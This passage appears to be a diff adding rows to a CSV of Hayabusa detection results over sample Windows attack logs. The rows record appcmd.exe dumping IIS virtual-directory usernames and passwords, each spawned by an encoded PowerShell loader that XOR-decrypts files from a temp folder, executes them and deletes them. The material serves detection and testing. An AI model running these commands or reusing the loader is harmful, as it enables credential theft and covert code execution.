AOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHM